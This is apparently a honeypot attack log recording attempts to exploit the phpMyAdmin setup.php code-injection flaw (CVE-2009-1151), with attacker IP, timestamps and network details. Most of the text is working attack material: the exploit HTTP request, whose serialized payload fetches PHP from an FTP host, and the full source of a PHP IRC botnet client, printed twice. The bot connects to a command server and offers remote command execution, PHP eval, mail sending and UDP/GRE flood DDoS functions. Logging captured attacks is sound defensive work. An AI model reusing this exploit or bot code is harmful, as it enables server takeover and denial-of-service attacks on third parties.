phpMyAdmin is prone to a remote PHP code-injection vulnerability on the page "setup.php". An attacker can exploit this issue to inject and execute arbitrary malicious PHP code in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible. Versions prior to phpMyAdmin 2.11.9.5 and 3.1.3.1 are vulnerable.CVE
CVE-2009-1151Author
Adrian "pagvac" PastorPlugin ID
oosheefee1baixeinief5nociu5shohhPOST /myadmin/scripts/setup.php HTTP/1.1
Content-Length: 235
cookie2: $Version="1"
Host: 150.152.32.232:8080
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]
connection: TE
referer: http://150.152.32.232:8080/myadmin/scripts/setup.php
cookie: phpMyAdmin=8b9c125f60efa70aebe2644e6fcea070
te: deflate,gzip;q=0.3
Content-Type: application/x-www-form-urlencoded
action=lay_navigation&eoltype=unix&token=6f7368443376d090ceb5915c78d2b83d&configuration=a%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA%5FConfig%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A28%3A%22ftp%3A%2F%2F144%2E217%2E160%2E29%2FPMA%2Ephp%22%3B%7D%7D
Resource ( 1 / 1 )
MD5: 05fc9af5ffbc8d487682d2275fdf4983
Type: text/x-php
Size: 19345
URL: ftp://144.217.160.29/PMA.php
Php IRC bot for phpmyadmin exploit
go to line 86 to edit irc info
<?php
set_time_limit(0);
error_reporting(0);
$dir = getcwd();
$uname= @php_uname();
function whereistmP()
{
$uploadtmp=ini_get('upload_tmp_dir');
$uf=getenv('USERPROFILE');
$af=getenv('ALLUSERSPROFILE');
$se=ini_get('session.save_path');
$envtmp=(getenv('TMP'))?getenv('TMP'):getenv('TEMP');
if(is_dir('/tmp') && is_writable('/tmp'))return '/tmp';
if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))return '/usr/tmp';
if(is_dir('/var/tmp') && is_writable('/var/tmp'))return '/var/tmp';
if(is_dir($uf) && is_writable($uf))return $uf;
if(is_dir($af) && is_writable($af))return $af;
if(is_dir($se) && is_writable($se))return $se;
if(is_dir($uploadtmp) && is_writable($uploadtmp))return $uploadtmp;
if(is_dir($envtmp) && is_writable($envtmp))return $envtmp;
return '.';
}
function srvshelL($command)
{
$name=whereistmP()."\\".uniqid('NJ');
$n=uniqid('NJ');
$cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system32\\cmd.exe':$_SERVER['ComSpec'];
win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c $command >\"$name\""));
win32_start_service($n);
win32_stop_service($n);
win32_delete_service($n);
while(!file_exists($name))sleep(1);
$exec=file_get_contents($name);
unlink($name);
return $exec;
}
function ffishelL($command)
{
$name=whereistmP()."\\".uniqid('NJ');
$api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
$res=$api->WinExec("cmd.exe /c $command >\"$name\"",0);
while(!file_exists($name))sleep(1);
$exec=file_get_contents($name);
unlink($name);
return $exec;
}
function comshelL($command,$ws)
{
$exec=$ws->exec("cmd.exe /c $command");
$so=$exec->StdOut();
return $so->ReadAll();
}
function perlshelL($command)
{
$perl=new perl();
ob_start();
$perl->eval("system(\"$command\")");
$exec=ob_get_contents();
ob_end_clean();
return $exec;
}
function Exe($command)
{
$exec=$output='';
$dep[]=array('pipe','r');$dep[]=array('pipe','w');
if(function_exists('passthru')){ob_start();@passthru_($command);$exec=ob_get_contents();ob_clean();ob_end_clean();}
elseif(function_exists('system')){$tmp=ob_get_contents();ob_clean();@system($command);$output=ob_get_contents();ob_clean();$exec=$tmp;}
elseif(function_exists('exec')){@exec($command,$output);$output=join("\n",$output);$exec=$output;}
elseif(function_exists('shell_exec'))[email protected]_exec($command);
elseif(function_exists('popen')){[email protected]($command,'r');while(!feof($output)){$exec=fgets($output);}pclose($output);}
elseif(function_exists('proc_open')){[email protected]_open($command,$dep,$pipes);while(!feof($pipes[1])){$line=fgets($pipes[1]);$output.=$line;}$exec=$output;proc_close($res);}
elseif(function_exists('win_shell_execute') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')$exec=winshelL($command);
elseif(function_exists('win32_create_service') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')$exec=srvshelL($command);
elseif(extension_loaded('ffi') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')$exec=ffishelL($command);
elseif(extension_loaded('perl'))$exec=perlshelL($command);
return $exec;
}
class sell
{
var $config = array("server"=>"144.217.160.29", "port"=>"443", "key"=>"", "prefix"=>"DDOS-", "maxrand"=>"8", "chan"=>"#pma", "trigger"=>"-", "password"=>"bleed", "auth"=>"");
var $users = array();
function start()
{
while(true)
{
if(!($this->conn = fsockopen($this->config['server'],$this->config['port'],$e,$s,30))) $this->start();
$pass = $this->config['password'];
$alph = range("0","9");
$this->send("PASS ".$pass."");
if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') $ident = "Windows";
else $ident = "Linux";
$this->send("USER ".$ident." 127.0.0.1 localhost :".php_uname()."");
$this->set_nick();
$this->main();
}
}
function main()
{
while(!feof($this->conn))
{
if(function_exists('stream_select'))
{
$read = array($this->conn);
$write = NULL;
$except = NULL;
$changed = stream_select($read, $write, $except, 30);
if($changed == 0)
{
fwrite($this->conn, "PING :lelcomeatme\r\n");
$read = array($this->conn);
$write = NULL;
$except = NULL;
$changed = stream_select($read, $write, $except, 30);
if($changed == 0) break;
}
}
$this->buf = trim(fgets($this->conn,512));
$cmd = explode(" ",$this->buf);
if(substr($this->buf,0,6)=="PING :") { $this->send("PONG :".substr($this->buf,6)); continue; }
if(isset($cmd[1]) && $cmd[1] =="001") {
$this->auth($this->config['auth']);
$this->join($this->config['chan'],$this->config['key']);
if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') $this->join("#PMA");
else $this->join("#PMA");
continue;
}
if(isset($cmd[1]) && $cmd[1]=="443") { $this->set_nick(); continue; }
if($this->buf != $old_buf)
{
$mcmd = array();
$msg = substr(strstr($this->buf," :"),2);
$msgcmd = explode(" ",$msg);
$nick = explode("!",$cmd[0]);
$vhost = explode("@",$nick[1]);
$vhost = $vhost[1];
$nick = substr($nick[0],1);
$host = $cmd[0];
if($msgcmd[0]==$this->nick) for($i=0;$i<count($msgcmd);$i++) $mcmd[$i] = $msgcmd[$i+1];
else for($i=0;$i<count($msgcmd);$i++) $mcmd[$i] = $msgcmd[$i];
if(count($cmd)>2)
{
switch($cmd[1])
{
case "PRIVMSG":
if(substr($mcmd[0],0,1)=="-")
{
switch(substr($mcmd[0],1))
{
case "mail":
if(count($mcmd)>4)
{
$header = "From: <".$mcmd[2].">";
if(!mail($mcmd[1],$mcmd[3],strstr($msg,$mcmd[4]),$header))
{
$this->privmsg($this->config['chan'],"[\2mail\2]: failed sending.");
}
else
{
$this->privmsg($this->config['chan'],"[\2mail\2]: sent.");
}
}
break;
case "dns":
if(isset($mcmd[1]))
{
$ip = explode(".",$mcmd[1]);
if(count($ip)==4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3]))
{
$this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyaddr($mcmd[1]));
}
else
{
$this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyname($mcmd[1]));
}
}
break;
case "___":
$this->privmsg($this->config['chan'], "~http://" . $_SERVER['SERVER_NAME'] . "" . $_SERVER['REQUEST_URI'] . "");
break;
case "uname":
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
else { $safemode = "off"; }
$uname = php_uname();
$this->privmsg($this->config['chan'],"[\2info\2]: ".$uname." (safe: ".$safemode.")");
break;
case "raw":
$this->send(strstr($msg,$mcmd[1]));
break;
case "eval":
ob_start();
eval(strstr($msg,$mcmd[1]));
$exec=ob_get_contents();
ob_end_clean();
$ret = explode("\n",$exec);
for($i=0;$i<count($ret);$i++) if($ret[$i]!=NULL) $this->privmsg($this->config['chan']," : ".trim($ret[$i]));
break;
case "exec":
$command = substr(strstr($msg, $mcmd[0]), strlen($mcmd[0]) + 1);
$exec = exec($command);
$ret = explode("\n", $exec);
for ($i = 0; $i < count($ret); $i++)
if ($ret[$i] != NULL)
$this->privmsg($this->config['chan'], " : " . trim($ret[$i]));
break;
case "udp":
if(count($mcmd)>3) { $this->udp($mcmd[1],$mcmd[2],$mcmd[3]); }
break;
case "udptls":
if(count($mcmd)>3) { $this->udp($mcmd[1],$mcmd[2],$mcmd[3]); }
break;
case "udpstd":
if(count($mcmd)>3) { $this->udp($mcmd[1],$mcmd[2],$mcmd[3]); }
break;
case "udpflood":
if(count($mcmd)>4) { $this->udpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4]); }
break;
case "greflood":
if(count($mcmd)>4) { $this->greflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4]); }
break;
case "tcpconn":
if(count($mcmd)>3) { $this->tcpconn($mcmd[1],$mcmd[2],$mcmd[3]); }
break;
case "die":
if(count($mcmd)>0) { fclose($this->conn); exit();}
break;
}
}
break;
}
}
}
}
}
function send($msg) { fwrite($this->conn,$msg."\r\n"); }
function join($chan,$key=NULL) { $this->send("JOIN ".$chan." ".$key); }
function auth($chan) { $this->send("PART ".$chan); }
function privmsg($to,$msg) { $this->send("PRIVMSG ".$to." :".$msg); }
function notice($to,$msg) { $this->send("NOTICE ".$to." :".$msg); }
function set_nick()
{
$prefix = "DDOS-%s";
$nickk = substr(str_shuffle("1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ"), 0, $this->config['maxrand']);
$this->nick = sprintf($prefix, $nickk);
$this->send("NICK ".$this->nick);
}
function udpstd($host,$port,$time) {
$packetsize = 65500;
$this->privmsg($this->config['chan'],"[\2BOTS DDOSING!STD\2]");
$msgg = "STD";
for($i=0;$i<$packetsize;$i++) { $msgg .= chr(rand(1,256)); }
$end = time() + $time;
$i = 0;
$fp = fsockopen("udp://".$host,$port,$e,$s,5);
while(true)
{
fwrite($fp,$msgg);
fflush($fp);
if($i % 100 == 0)
{
if($end < time()) break;
}
$i++;
}
fclose($fp);
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'],"[\2 std DDOS Finished\2]: ".$env." MB sent / Average: ".$vel." MB/s ");
}
function udp($host,$port,$time) {
$packetsize = 65500;
$this->privmsg($this->config['chan'],"[\2BOTS DDOSING!\2]");
$packet = "";
for($i=0;$i<$packetsize;$i++) { $packet .= chr(rand(1,256)); }
$end = time() + $time;
$i = 0;
$fp = fsockopen("udp://".$host,$port,$e,$s,5);
while(true)
{
fwrite($fp,$packet);
fflush($fp);
if($i % 100 == 0)
{
if($end < time()) break;
}
$i++;
}
fclose($fp);
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'],"[\2DDOS Finished\2]: ".$env." MB sent / Average: ".$vel." MB/s ");
}
function udptls($host,$port,$time) {
$packetsize = 65500;
$this->privmsg($this->config['chan'],"[\2BOTS DDOSING!\2]");
$packet = "";
for($i=0;$i<$packetsize;$i++) { $packet .= chr(rand(1,256)); }
$end = time() + $time;
$i = 0;
$fp = fsockopen("tls://".$host,$port,$e,$s,5);
while(true)
{
fwrite($fp,$packet);
fflush($fp);
if($i % 100 == 0)
{
if($end < time()) break;
}
$i++;
}
fclose($fp);
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'],"[\2DDOS Finished\2]: ".$env." MB sent / Average: ".$vel." MB/s ");
}
function udpflood($host,$port,$time,$packetsize) {
$this->privmsg($this->config['chan'],"[\2BOTS DDOSING!\2]");
$packet = "";
for($i=0;$i<$packetsize;$i++) { $packet .= chr(rand(1,256)); }
$end = time() + $time;
$multitarget = false;
if(strpos($host, ",") !== FALSE)
{
$multitarget = true;
$host = explode(",", $host);
}
$i = 0;
if($multitarget)
{
$fp = array();
foreach($host as $hostt) $fp[] = fsockopen("udp://".$hostt,$port,$e,$s,5);
$count = count($host);
while(true)
{
fwrite($fp[$i % $count],$packet);
fflush($fp[$i % $count]);
if($i % 100 == 0)
{
if($end < time()) break;
}
$i++;
}
foreach($fp as $fpp) fclose($fpp);
} else {
$fp = fsockopen("udp://".$host,$port,$e,$s,5);
while(true)
{
fwrite($fp,$packet);
fflush($fp);
if($i % 100 == 0)
{
if($end < time()) break;
}
$i++;
}
fclose($fp);
}
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'],"[\2DDOS ENDED!\2]: ".$env." MB sent / Average: ".$vel." MB/s ");
}
function greflood($host,$port,$time,$packetsize) {
$this->privmsg($this->config['chan'],"[\2BOTS DDOSING!\2]");
$packet = "";
for($i=0;$i<$packetsize;$i++) { $packet .= chr(rand(1,256)); }
$end = time() + $time;
$multitarget = false;
if(strpos($host, ",") !== FALSE)
{
$multitarget = true;
$host = explode(",", $host);
}
$i = 0;
if($multitarget)
{
$fp = array();
foreach($host as $hostt) $fp[] = fsockopen("gre://".$hostt,$port,$e,$s,5);
$count = count($host);
while(true)
{
fwrite($fp[$i % $count],$packet);
fflush($fp[$i % $count]);
if($i % 100 == 0)
{
if($end < time()) break;
}
$i++;
}
foreach($fp as $fpp) fclose($fpp);
} else {
$fp = fsockopen("gre://".$host,$port,$e,$s,5);
while(true)
{
fwrite($fp,$packet);
fflush($fp);
if($i % 100 == 0)
{
if($end < time()) break;
}
$i++;
}
fclose($fp);
}
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'],"[\2DDOS ENDED!\2]: ".$env." MB sent / Average: ".$vel." MB/s ");
}
function tcp($host,$port,$time)
{
$this->privmsg($this->config['chan'],"[\2tcp started!\2]");
$end = time() + $time;
$i = 0;
while($end > time())
{
$fp = fsockopen("tcp://".$host, $port, $e, $s, 5);
fclose($fp);
$i++;
}
$this->privmsg($this->config['chan'],"[\2tcp Finished!\2]: sent ".$i." connections to $host:$port.");
}
}
$poll = new sell;
$poll->start();
?>
phpMyAdmin (/scripts/setup.php) PHP Code Injection Exploit
[Attack info]
Attacker:
64.137.241.24
Dest. port: 8080
Time: 10/12/2018 05:38:08
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS31798 DataCity
Location: Ontario, Waterloo (BlackBerry 14) (zipcode N2L)
rDNS: notassigned.cloudatcost.com
Description
phpMyAdmin is prone to a remote PHP code-injection vulnerability on the page "setup.php". An attacker can exploit this issue to inject and execute arbitrary malicious PHP code in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible. Versions prior to phpMyAdmin 2.11.9.5 and 3.1.3.1 are vulnerable.CVE
CVE-2009-1151Author
Adrian "pagvac" PastorPlugin ID
oosheefee1baixeinief5nociu5shohhPOST /2phpmyadmin/scripts/setup.php HTTP/1.1
Content-Length: 235
cookie2: $Version="1"
Host: 150.152.32.232:8080
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]
connection: TE
referer: http://150.152.32.232:8080/2phpmyadmin/scripts/setup.php
cookie: phpMyAdmin=8b9c125f60efa70aebe2644e6fcea070
te: deflate,gzip;q=0.3
Content-Type: application/x-www-form-urlencoded
action=lay_navigation&eoltype=unix&token=6f7368443376d090ceb5915c78d2b83d&configuration=a%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA%5FConfig%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A28%3A%22ftp%3A%2F%2F144%2E217%2E160%2E29%2FPMA%2Ephp%22%3B%7D%7D
Resource ( 1 / 1 )
MD5: 05fc9af5ffbc8d487682d2275fdf4983
Type: text/x-php
Size: 19345
URL: ftp://144.217.160.29/PMA.php
Php IRC bot for phpmyadmin exploit
go to line 86 to edit irc info
<?php
set_time_limit(0);
error_reporting(0);
$dir = getcwd();
$uname= @php_uname();
function whereistmP()
{
$uploadtmp=ini_get('upload_tmp_dir');
$uf=getenv('USERPROFILE');
$af=getenv('ALLUSERSPROFILE');
$se=ini_get('session.save_path');
$envtmp=(getenv('TMP'))?getenv('TMP'):getenv('TEMP');
if(is_dir('/tmp') && is_writable('/tmp'))return '/tmp';
if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))return '/usr/tmp';
if(is_dir('/var/tmp') && is_writable('/var/tmp'))return '/var/tmp';
if(is_dir($uf) && is_writable($uf))return $uf;
if(is_dir($af) && is_writable($af))return $af;
if(is_dir($se) && is_writable($se))return $se;
if(is_dir($uploadtmp) && is_writable($uploadtmp))return $uploadtmp;
if(is_dir($envtmp) && is_writable($envtmp))return $envtmp;
return '.';
}
function srvshelL($command)
{
$name=whereistmP()."\\".uniqid('NJ');
$n=uniqid('NJ');
$cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system32\\cmd.exe':$_SERVER['ComSpec'];
win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c $command >\"$name\""));
win32_start_service($n);
win32_stop_service($n);
win32_delete_service($n);
while(!file_exists($name))sleep(1);
$exec=file_get_contents($name);
unlink($name);
return $exec;
}
function ffishelL($command)
{
$name=whereistmP()."\\".uniqid('NJ');
$api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
$res=$api->WinExec("cmd.exe /c $command >\"$name\"",0);
while(!file_exists($name))sleep(1);
$exec=file_get_contents($name);
unlink($name);
return $exec;
}
function comshelL($command,$ws)
{
$exec=$ws->exec("cmd.exe /c $command");
$so=$exec->StdOut();
return $so->ReadAll();
}
function perlshelL($command)
{
$perl=new perl();
ob_start();
$perl->eval("system(\"$command\")");
$exec=ob_get_contents();
ob_end_clean();
return $exec;
}
function Exe($command)
{
$exec=$output='';
$dep[]=array('pipe','r');$dep[]=array('pipe','w');
if(function_exists('passthru')){ob_start();@passthru_($command);$exec=ob_get_contents();ob_clean();ob_end_clean();}
elseif(function_exists('system')){$tmp=ob_get_contents();ob_clean();@system($command);$output=ob_get_contents();ob_clean();$exec=$tmp;}
elseif(function_exists('exec')){@exec($command,$output);$output=join("\n",$output);$exec=$output;}
elseif(function_exists('shell_exec'))[email protected]_exec($command);
elseif(function_exists('popen')){[email protected]($command,'r');while(!feof($output)){$exec=fgets($output);}pclose($output);}
elseif(function_exists('proc_open')){[email protected]_open($command,$dep,$pipes);while(!feof($pipes[1])){$line=fgets($pipes[1]);$output.=$line;}$exec=$output;proc_close($res);}
elseif(function_exists('win_shell_execute') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')$exec=winshelL($command);
elseif(function_exists('win32_create_service') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')$exec=srvshelL($command);
elseif(extension_loaded('ffi') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')$exec=ffishelL($command);
elseif(extension_loaded('perl'))$exec=perlshelL($command);
return $exec;
}
class sell
{
var $config = array("server"=>"144.217.160.29", "port"=>"443", "key"=>"", "prefix"=>"DDOS-", "maxrand"=>"8", "chan"=>"#pma", "trigger"=>"-", "password"=>"bleed", "auth"=>"");
var $users = array();
function start()
{
while(true)
{
if(!($this->conn = fsockopen($this->config['server'],$this->config['port'],$e,$s,30))) $this->start();
$pass = $this->config['password'];
$alph = range("0","9");
$this->send("PASS ".$pass."");
if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') $ident = "Windows";
else $ident = "Linux";
$this->send("USER ".$ident." 127.0.0.1 localhost :".php_uname()."");
$this->set_nick();
$this->main();
}
}
function main()
{
while(!feof($this->conn))
{
if(function_exists('stream_select'))
{
$read = array($this->conn);
$write = NULL;
$except = NULL;
$changed = stream_select($read, $write, $except, 30);
if($changed == 0)
{
fwrite($this->conn, "PING :lelcomeatme\r\n");
$read = array($this->conn);
$write = NULL;
$except = NULL;
$changed = stream_select($read, $write, $except, 30);
if($changed == 0) break;
}
}
$this->buf = trim(fgets($this->conn,512));
$cmd = explode(" ",$this->buf);
if(substr($this->buf,0,6)=="PING :") { $this->send("PONG :".substr($this->buf,6)); continue; }
if(isset($cmd[1]) && $cmd[1] =="001") {
$this->auth($this->config['auth']);
$this->join($this->config['chan'],$this->config['key']);
if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') $this->join("#PMA");
else $this->join("#PMA");
continue;
}
if(isset($cmd[1]) && $cmd[1]=="443") { $this->set_nick(); continue; }
if($this->buf != $old_buf)
{
$mcmd = array();
$msg = substr(strstr($this->buf," :"),2);
$msgcmd = explode(" ",$msg);
$nick = explode("!",$cmd[0]);
$vhost = explode("@",$nick[1]);
$vhost = $vhost[1];
$nick = substr($nick[0],1);
$host = $cmd[0];
if($msgcmd[0]==$this->nick) for($i=0;$i<count($msgcmd);$i++) $mcmd[$i] = $msgcmd[$i+1];
else for($i=0;$i<count($msgcmd);$i++) $mcmd[$i] = $msgcmd[$i];
if(count($cmd)>2)
{
switch($cmd[1])
{
case "PRIVMSG":
if(substr($mcmd[0],0,1)=="-")
{
switch(substr($mcmd[0],1))
{
case "mail":
if(count($mcmd)>4)
{
$header = "From: <".$mcmd[2].">";
if(!mail($mcmd[1],$mcmd[3],strstr($msg,$mcmd[4]),$header))
{
$this->privmsg($this->config['chan'],"[\2mail\2]: failed sending.");
}
else
{
$this->privmsg($this->config['chan'],"[\2mail\2]: sent.");
}
}
break;
case "dns":
if(isset($mcmd[1]))
{
$ip = explode(".",$mcmd[1]);
if(count($ip)==4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3]))
{
$this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyaddr($mcmd[1]));
}
else
{
$this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyname($mcmd[1]));
}
}
break;
case "___":
$this->privmsg($this->config['chan'], "~http://" . $_SERVER['SERVER_NAME'] . "" . $_SERVER['REQUEST_URI'] . "");
break;
case "uname":
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
else { $safemode = "off"; }
$uname = php_uname();
$this->privmsg($this->config['chan'],"[\2info\2]: ".$uname." (safe: ".$safemode.")");
break;
case "raw":
$this->send(strstr($msg,$mcmd[1]));
break;
case "eval":
ob_start();
eval(strstr($msg,$mcmd[1]));
$exec=ob_get_contents();
ob_end_clean();
$ret = explode("\n",$exec);
for($i=0;$i<count($ret);$i++) if($ret[$i]!=NULL) $this->privmsg($this->config['chan']," : ".trim($ret[$i]));
break;
case "exec":
$command = substr(strstr($msg, $mcmd[0]), strlen($mcmd[0]) + 1);
$exec = exec($command);
$ret = explode("\n", $exec);
for ($i = 0; $i < count($ret); $i++)
if ($ret[$i] != NULL)
$this->privmsg($this->config['chan'], " : " . trim($ret[$i]));
break;
case "udp":
if(count($mcmd)>3) { $this->udp($mcmd[1],$mcmd[2],$mcmd[3]); }
break;
case "udptls":
if(count($mcmd)>3) { $this->udp($mcmd[1],$mcmd[2],$mcmd[3]); }
break;
case "udpstd":
if(count($mcmd)>3) { $this->udp($mcmd[1],$mcmd[2],$mcmd[3]); }
break;
case "udpflood":
if(count($mcmd)>4) { $this->udpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4]); }
break;
case "greflood":
if(count($mcmd)>4) { $this->greflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4]); }
break;
case "tcpconn":
if(count($mcmd)>3) { $this->tcpconn($mcmd[1],$mcmd[2],$mcmd[3]); }
break;
case "die":
if(count($mcmd)>0) { fclose($this->conn); exit();}
break;
}
}
break;
}
}
}
}
}
function send($msg) { fwrite($this->conn,$msg."\r\n"); }
function join($chan,$key=NULL) { $this->send("JOIN ".$chan." ".$key); }
function auth($chan) { $this->send("PART ".$chan); }
function privmsg($to,$msg) { $this->send("PRIVMSG ".$to." :".$msg); }
function notice($to,$msg) { $this->send("NOTICE ".$to." :".$msg); }
function set_nick()
{
$prefix = "DDOS-%s";
$nickk = substr(str_shuffle("1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ"), 0, $this->config['maxrand']);
$this->nick = sprintf($prefix, $nickk);
$this->send("NICK ".$this->nick);
}
function udpstd($host,$port,$time) {
$packetsize = 65500;
$this->privmsg($this->config['chan'],"[\2BOTS DDOSING!STD\2]");
$msgg = "STD";
for($i=0;$i<$packetsize;$i++) { $msgg .= chr(rand(1,256)); }
$end = time() + $time;
$i = 0;
$fp = fsockopen("udp://".$host,$port,$e,$s,5);
while(true)
{
fwrite($fp,$msgg);
fflush($fp);
if($i % 100 == 0)
{
if($end < time()) break;
}
$i++;
}
fclose($fp);
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'],"[\2 std DDOS Finished\2]: ".$env." MB sent / Average: ".$vel." MB/s ");
}
function udp($host,$port,$time) {
$packetsize = 65500;
$this->privmsg($this->config['chan'],"[\2BOTS DDOSING!\2]");
$packet = "";
for($i=0;$i<$packetsize;$i++) { $packet .= chr(rand(1,256)); }
$end = time() + $time;
$i = 0;
$fp = fsockopen("udp://".$host,$port,$e,$s,5);
while(true)
{
fwrite($fp,$packet);
fflush($fp);
if($i % 100 == 0)
{
if($end < time()) break;
}
$i++;
}
fclose($fp);
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'],"[\2DDOS Finished\2]: ".$env." MB sent / Average: ".$vel." MB/s ");
}
function udptls($host,$port,$time) {
$packetsize = 65500;
$this->privmsg($this->config['chan'],"[\2BOTS DDOSING!\2]");
$packet = "";
for($i=0;$i<$packetsize;$i++) { $packet .= chr(rand(1,256)); }
$end = time() + $time;
$i = 0;
$fp = fsockopen("tls://".$host,$port,$e,$s,5);
while(true)
{
fwrite($fp,$packet);
fflush($fp);
if($i % 100 == 0)
{
if($end < time()) break;
}
$i++;
}
fclose($fp);
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'],"[\2DDOS Finished\2]: ".$env." MB sent / Average: ".$vel." MB/s ");
}
function udpflood($host,$port,$time,$packetsize) {
$this->privmsg($this->config['chan'],"[\2BOTS DDOSING!\2]");
$packet = "";
for($i=0;$i<$packetsize;$i++) { $packet .= chr(rand(1,256)); }
$end = time() + $time;
$multitarget = false;
if(strpos($host, ",") !== FALSE)
{
$multitarget = true;
$host = explode(",", $host);
}
$i = 0;
if($multitarget)
{
$fp = array();
foreach($host as $hostt) $fp[] = fsockopen("udp://".$hostt,$port,$e,$s,5);
$count = count($host);
while(true)
{
fwrite($fp[$i % $count],$packet);
fflush($fp[$i % $count]);
if($i % 100 == 0)
{
if($end < time()) break;
}
$i++;
}
foreach($fp as $fpp) fclose($fpp);
} else {
$fp = fsockopen("udp://".$host,$port,$e,$s,5);
while(true)
{
fwrite($fp,$packet);
fflush($fp);
if($i % 100 == 0)
{
if($end < time()) break;
}
$i++;
}
fclose($fp);
}
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'],"[\2DDOS ENDED!\2]: ".$env." MB sent / Average: ".$vel." MB/s ");
}
function greflood($host,$port,$time,$packetsize) {
$this->privmsg($this->config['chan'],"[\2BOTS DDOSING!\2]");
$packet = "";
for($i=0;$i<$packetsize;$i++) { $packet .= chr(rand(1,256)); }
$end = time() + $time;
$multitarget = false;
if(strpos($host, ",") !== FALSE)
{
$multitarget = true;
$host = explode(",", $host);
}
$i = 0;
if($multitarget)
{
$fp = array();
foreach($host as $hostt) $fp[] = fsockopen("gre://".$hostt,$port,$e,$s,5);
$count = count($host);
while(true)
{
fwrite($fp[$i % $count],$packet);
fflush($fp[$i % $count]);
if($i % 100 == 0)
{
if($end < time()) break;
}
$i++;
}
foreach($fp as $fpp) fclose($fpp);
} else {
$fp = fsockopen("gre://".$host,$port,$e,$s,5);
while(true)
{
fwrite($fp,$packet);
fflush($fp);
if($i % 100 == 0)
{
if($end < time()) break;
}
$i++;
}
fclose($fp);
}
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'],"[\2DDOS ENDED!\2]: ".$env." MB sent / Average: ".$vel." MB/s ");
}
function tcp($host,$port,$time)
{
$this->privmsg($this->config['chan'],"[\2tcp started!\2]");
$end = time() + $time;
$i = 0;
while($end > time())
{
$fp = fsockopen("tcp://".$host, $port, $e, $s, 5);
fclose($fp);
$i++;
}
$this->privmsg($this->config['chan'],"[\2tcp Finished!\2]: sent ".$i." connections to $host:$port.");
}
}
$poll = new sell;
$poll->start();
?>
phpMyAdmin (/scripts/setup.php) PHP Code Injection Exploit
[Attack info]
Attacker:
64.137.241.24
Dest. port: 8080
Time: 09/12/2018 19:52:56
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS31798 DataCity
Location: Ontario, Waterloo (BlackBerry 14) (zipcode N2L)
rDNS: notassigned.cloudatcost.com
Description
phpMyAdmin is prone to a remote PHP code-injection vulnerability on the page "setup.php". An attacker can exploit this issue to inject and execute arbitrary malicious PHP code in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible. Versions prior to phpMyAdmin 2.11.9.5 and 3.1.3.1 are vulnerable.CVE
CVE-2009-1151Author
Adrian "pagvac" PastorPlugin ID
